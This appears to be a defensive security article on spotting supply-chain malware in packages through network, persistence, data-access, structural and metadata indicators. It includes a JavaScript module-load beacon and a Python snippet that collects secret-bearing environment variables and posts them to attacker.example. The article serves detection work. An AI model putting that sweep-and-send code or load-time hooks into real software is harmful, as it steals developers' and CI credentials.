The Limits of Signature Detection

Signature-based malware scanning works by matching code against known patterns. A hash, a string, a sequence of bytes. It's effective for malware that has been previously identified and catalogued β€” and ineffective for everything else.

Supply chain malware campaigns are explicitly designed to evade signatures. Attackers generate new variants for each campaign, use obfuscation to change the byte-level signature, and host payloads externally so the package file itself contains no obvious malicious content.

The detection gap: Between the time malware is first deployed and the time it's added to a signature database, it operates undetected. For supply chain attacks targeting CI credentials, the window of first deployment to detection is measured in hours β€” enough to exfiltrate credentials from every CI run in that period.

Network Behaviour Indicators

Most malware needs to communicate with attacker infrastructure. Network behaviour indicators in source code:

  • Hardcoded external URLs in unexpected contexts β€” a utility library making outbound HTTPS calls to a domain unrelated to its stated purpose
  • Dynamic URL construction β€” building URLs from string concatenation or encoding rather than using explicit constants
  • DNS-based communication β€” dns.resolve(), getaddrinfo() calls with data-derived hostnames
  • Network calls in lifecycle hooks β€” any outbound call in postinstall, class constructors, module initialisation, or process exit handlers
  • Unconditional background requests β€” requests that fire regardless of application logic, especially on startup
suspicious network call in module initJavaScript
// Red flag: network call executes at module load time
// before any application code runs
const { hostname } = require('os');
const https = require('https');

// Immediately Invoked β€” runs on require()
(async () => {
  await https.get(
    `https://telemetry.example.com/ping?h=${hostname()}&v=${process.version}`
  ).catch(() => {});
})();

Persistence Indicators

Malware that wants to survive a reboot, container restart, or package reinstall needs persistence mechanisms:

  • Cron job creation β€” writing to /etc/cron.d/, crontab -e, or using OS scheduling APIs
  • Shell profile modification β€” writes to ~/.bashrc, ~/.profile, ~/.zshrc
  • Startup service registration β€” writing systemd unit files, launchd plists, or Windows registry run keys
  • npm global script injection β€” modifying ~/.npmrc scripts section
  • Git hook installation β€” writing to .git/hooks/ directory in the checked-out repository

Data Access Indicators

What a piece of code accesses tells you a lot about its intent. Suspicious data access patterns:

  • Environment variable mass collection β€” iterating all environment variables rather than accessing specific named ones
  • Credential file access β€” reading ~/.aws/credentials, ~/.ssh/id_rsa, ~/.npmrc, ~/.docker/config.json
  • Browser data access β€” reading browser cookie files, saved passwords, or local storage
  • Clipboard access β€” reading system clipboard content (cryptocurrency wallet address replacement)
  • Keylogging APIs β€” hooking keyboard events at the OS level
environment credential sweepPython
import os, json, urllib.request

# Mass environment variable sweep β€” high-confidence malware indicator
sensitive = {
    k: v for k, v in os.environ.items()
    if any(kw in k.lower() for kw in
       ['key', 'token', 'secret', 'password', 'aws', 'gcp', 'azure', 'api'])
}
urllib.request.urlopen(
    'https://attacker.example/collect',
    data=json.dumps(sensitive).encode()
)

Structural Code Anomalies

Malicious code often has structural characteristics that differ from legitimate code:

  • Unreachable code following legitimate logic β€” dead code blocks that the static analyser doesn't flag as dead because they're conditionally executed
  • Asymmetric function complexity β€” one function that is dramatically more complex than everything else in the file
  • Comment-code ratio outliers β€” malicious additions typically have no comments, creating a detectable gap in a well-commented codebase
  • String-heavy code without surrounding context β€” large string constants that have no obvious relationship to the function they appear in
  • Unexpected imports β€” a library that processes images importing network and process execution modules

Contextual and Metadata Signals

Beyond the code itself, metadata provides high-signal indicators:

  • New package with high download velocity β€” organic packages grow slowly; typosquatted packages get installs immediately from developer mistakes
  • Package published immediately before a CI run β€” coordinated attacks time publication to coincide with known CI schedules
  • Maintainer account age vs. package age β€” a maintainer account created days before publishing a popular-seeming package
  • Mismatch between package description and actual code β€” a package claiming to be a utility library that imports network and process modules
  • Empty or minimal source repository β€” a published package with no corresponding public source repository, or a repository with one commit

Combine signals for confidence. No single indicator is sufficient. A network call in a utility library might be legitimate telemetry. Environment variable access in a CLI tool is expected. It's the combination β€” network call + environment variable access + new package + no source repository β€” that builds high-confidence malware classification.